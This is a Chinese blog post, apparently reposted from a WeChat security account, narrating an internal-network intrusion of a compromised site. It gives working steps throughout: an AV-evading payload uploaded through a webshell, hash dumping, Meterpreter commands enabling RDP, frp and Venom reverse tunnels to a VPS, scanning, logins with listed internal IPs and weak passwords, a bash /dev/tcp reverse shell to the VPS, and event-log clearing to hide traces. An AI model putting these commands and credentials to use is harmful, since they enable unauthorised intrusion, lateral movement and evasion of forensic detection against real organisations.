马上hw,这两天闲的荒,来点实操, --2022/6/21 19:05
上次打攻防漏了很多web端、很多ssh这块和端口转发的内容,,算是个很大的缺口,从我那上百个shell中随机挑个站点,开始一场内网渗透。具体怎么拿的shell,在这里https://blog.csdn.net/qq_29437513/article/details/122283851
0x01.Viper上线
viper更新到1.5.22了,通过Callback回调函数生成免杀exe,下载本地,上传目标机
冰蝎执行
目标环境有360,但viper还是上线了
老话题: 怎么绕过的360?怎么上线的?
1.某60,执行命令拦的很,各种白名单拦截,同时还弹窗,最常见的net user执行返回拒绝,这种情况360全部功能全开
2.第二种情况,360不全开,比如,用户长时间未登录,锁定,不会全拦
0x02.抓取Hash
上线后,抓取hash,viper自带有hashdump,但需要进程x64,默认上线的进程x86,进行进程迁移,,选择高权限的conhost.exe 2345explor 这些进程,(尽量不选择靠前的系统进程,注入容易重启)
抓到hash,拿去解密,Aa123456,这个内网常用弱口令,mssql和rdp,ssh常用(root admin123)
msf模块,注册表开启3389 post/windows/manage/enable_rdp
reg setval -k 'HKLMSystemCurrentControlSetControlTerminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
注册表的端口值
netstat发现已经监听,但端口扫描未发现开启,得出结论,这是内网机器,通过映射到出口ip上,
0x03.端口转发
内网的机子,虽然有webshell,但他是映射到出口ip上,不能正向代理。
可以反向代理,机子能访问外网vps的端口,吧流量转到vps端口上,在vps开个端口转发,本地pc机进行内网访问。
我这里用过的有frp 和Venom
01.frp的代理,常用的是vps监听端口,内网吧3389流量转发给vps
02.Venom的代理,和frp差不多,通常可以配合proxifer流量代理,本地Pc机访问到内网应用。
本地测试 frp
服务端只需要配置bind_port ,这里vps配置22222,
webshell端的frpc.ini配置,转发流量到vps的22222,允许外网通过vps的6000端口访问3389服务
转发成功,
吧解密的管理员密码登录
查看事件管理器,清除事件,很明显看到之前有人反复fuzz登录密码,同时登录没有rdp登录成功通过别的方式比如webshell部分也会记录,进程services.exe tomcat.exe
发现有teamviewer
0x04.内网横向
内网横向有域打域控,没域打内网其他的设备,看能拿多少台服务器,这次测试的目的是内网的服务器,内网的网络设备,摄像头、安全设备、数据库不考虑在内
判断域,不存在域
net time /domain 域控的时间同步
net config workstation 查看主机在内网的角色
横向我用的是端口转发是Venom,这tm就是神器,稳的一批。
内网资产扫描我用的是
https://github.com/1n7erface/RequestTemplate
扫描b端很全,,常见的ssh、redis和web扫描,xray的内核,挂到rdp里面
一些ssh
ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456
Venom内网渗透
1.webshell执行命令 agent.exe rhost rport
2.vps端监听1009,goto 1进行操作,socks代理出来本地PC通过proxifer代理连接
本地PC通过Proxifer设置socks代理
设置代理规则
本地PC-xshell连接内网ssh,
登录成功,查看history,有很明显的开发痕迹,这里不进行后续渗透
nc反弹shell到vps,点到为止,
nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1
反弹成功,拿到shell
到此为止,,走之前清理痕迹,msf批量扫描ms17-010捡个漏
msf添加路由,
有捡漏,但不进行后续渗透
原文始发于微信公众号(Qaseem安全团队):实战| 记一次借Viper来多重内网渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论